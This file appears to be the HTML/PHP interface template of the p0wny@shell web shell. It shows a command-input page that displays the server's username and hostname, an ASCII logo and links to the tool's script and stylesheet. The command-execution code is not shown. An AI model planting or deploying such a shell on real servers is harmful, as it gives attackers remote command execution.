<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset='UTF-8'/>
    <title>shell: <?=$username?>@<?=$hostname?></title>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'/>
    <link rel='stylesheet' href='./p0wny.css'>
    <script src='./p0wny.mjs' type="module" version="<?=$version?>" data-username="<?=$username?>" data-hostname="<?=$hostname?>"></script>
</head>

<body>
<div id="shell">
            <pre id="shell-content">
                <div id="shell-logo">
        ___                         ____      _          _ _        _  _   <span></span>
 _ __  / _ \__      ___ __  _   _  / __ \ ___| |__   ___| | |_ /\/|| || |_ <span></span>
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_  ..  _|<span></span>
| |_) | |_| |\ V  V /| | | | |_| | | (_| \__ \ | | |  __/ | |_   |_      _|<span></span>
| .__/ \___/  \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_)    |_||_|  <span></span>
|_|                         |___/  \____/                                  <span></span>
                </div>
            </pre>
    <div id="shell-input">
        <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
        <div>
            <input id="shell-cmd" name="cmd"/>
        </div>
    </div>
</div>
</body>

</html>
